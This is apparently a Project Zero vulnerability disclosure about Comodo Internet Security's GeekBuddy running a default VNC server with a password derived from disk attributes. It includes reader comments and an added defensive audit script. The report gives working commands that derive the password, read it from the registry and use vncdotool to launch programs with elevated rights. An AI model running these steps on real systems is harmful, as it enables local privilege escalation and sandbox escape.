
Issue 703

Issue metadata

Status: Fixed
Closed: Feb 2016

Comodo: Comodo Internet Security installs and starts a VNC server by default

Project Member Reported by, Jan 20 2016

Issue description

When you install Comodo Internet Security, in the default configuration an application called "GeekBuddy" is also installed and added to HKLM\System\CurrentControlSet\Services. GeekBuddy is a tech support application that uses a number of questionable and shady tactics to encourage users to pay for online tech support.

As has been noted by numerous people over the last few years, GeekBuddy also installs a VNC server and enables it by default.


This is an obvious and ridiculous local privilege escalation, which apparently Comodo believe they have resolved by generating a password instead of leaving it blank. That is not the case, as the password is simply the first 8 characters of SHA1(Disk.Caption+Disk.Signature+Disk.SerialNumber+Disk.TotalTracks). I imagine Comodo thought nobody would bother checking how they generated the password, because this clearly doesn't prevent the attack they claim it solved.

Not to mention that this is also a sandbox escape that even works against Comodo and Chromodo sandboxes, not to mention Chrome, Protected Mode, and other sandboxes.

This information is available to unprivileged users. For example, an unprivileged user can launch calc.exe like this:

$ wmic diskdrive get Caption,Signature,SerialNumber,TotalTracks
Caption                                    SerialNumber  Signature   TotalTracks
VMware, VMware Virtual S SCSI Disk Device                -135723213  1997160

$ printf VMware,VMwareVirtualSSCSIDiskDevice-13572321319971601997160 | sha1sum | cut -c-8

$ printf "key ctrl-esc\ntype calc.exe\nkey enter\n" | vncdotool -p 7d4612e5 -s localhost::5901 -

I'm using vncdotool from here:

(Note: if there is no SerialNumber field, TotalTracks needs to be repeated twice, I think this is a bug)

Or alternatively you can pull the password out of HKLM, just truncate it to 8 characters(!!!):

$ reg query HKLM\\System\\Software\\COMODO\\CLPS\ 4\\CA /v osInstanceId
    osInstanceId    REG_SZ    7d4612e59b27e4f19fc3d8e3491fb3bb879b18f3

Screenshot attached for reference.

It feels like there might be a way to make this remote, perhaps via dns-rebinding and websockets.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Windows 7-2016-01-19-15-59-11.png
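
A defensive check for the weakness described in the report, as an added example that is not part of the original report or Comodo's code: it flags a stored secret that can be recomputed from disk attributes any unprivileged user can read. The function names and the whitespace-stripping step are assumptions (the latter inferred from the report's printf string); the sample disk values are the ones shown in the report's wmic output.

```python
import hashlib
import secrets


def derived_secret(caption, signature, serial, total_tracks):
    """SHA1 over the disk attributes the report names, as 40 hex characters."""
    # Per the report's note: with no SerialNumber, TotalTracks appears twice.
    serial_part = serial if serial else total_tracks
    material = f"{caption}{signature}{serial_part}{total_tracks}"
    # Assumption: whitespace is dropped, as in the report's printf string.
    material = "".join(material.split())
    return hashlib.sha1(material.encode("utf-8")).hexdigest()


def audit_stored_secret(stored, disks):
    """Return findings if `stored` can be recomputed from any disk's attributes.

    `disks` is a list of (caption, signature, serial, total_tracks) tuples.
    """
    stored = stored.strip().lower()
    findings = []
    for disk in disks:
        candidate = derived_secret(*disk)
        if stored == candidate:
            findings.append(f"secret equals SHA1 of attributes of {disk[0]!r}")
        elif stored[:8] == candidate[:8]:
            # Only the first 8 characters serve as the password.
            findings.append(f"8-character prefix derivable from {disk[0]!r}")
    return findings


if __name__ == "__main__":
    # Disk values as shown in the report's wmic output (empty SerialNumber).
    disk = ("VMware, VMware Virtual S SCSI Disk Device", "-135723213", "", "1997160")
    weak = derived_secret(*disk)          # what the described scheme stores
    strong = secrets.token_hex(20)        # constructed: value from a CSPRNG
    for label, value in (("derived", weak), ("random", strong)):
        result = audit_stored_secret(value, [disk])
        print(label, "->", result or "not derivable from disk attributes")
```

A secret that passes this check is still truncated to 8 hexadecimal characters if it is used the way the report describes, which leaves at most 32 bits of password space.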
Project Member

Comment 1 by, Feb 18 2016

Labels: -Restrict-View-Commit
Status: Fixed
Update today:

Hello Tavis,

Regarding the vulnerability below, we have issued a hotfix on 10th of February. 

GB 4.25.380415.167 has the required fix and 90+% of existing users are updated as of now.

Wow, so that's what you meant on Twitter.

That's shady and horribly disappointing. If there was ever a reason to uninstall Comodo, this was it.

Thanks for everything you and Project Zero do. :)
comment from Comodo
Wow have you read the spin Comodo put on this? "ITS NOT REMOTELY EXPLOITABLE" they claim, completely dismissing responsibility for what is a serious privilege escalation vulnerability.

Comment 5 Deleted

This transcends a simple bug and vulnerability, it is a backdoor.
@tobias, indeed, it's also written after the fact, as though the current state is how it was before. 

You can't issue a patch, then claim there wasn't a problem by describing how the software works post-patch.
Labels: -Vendor-Comodo -Product-Comodo Vendor-comodo Product-comodo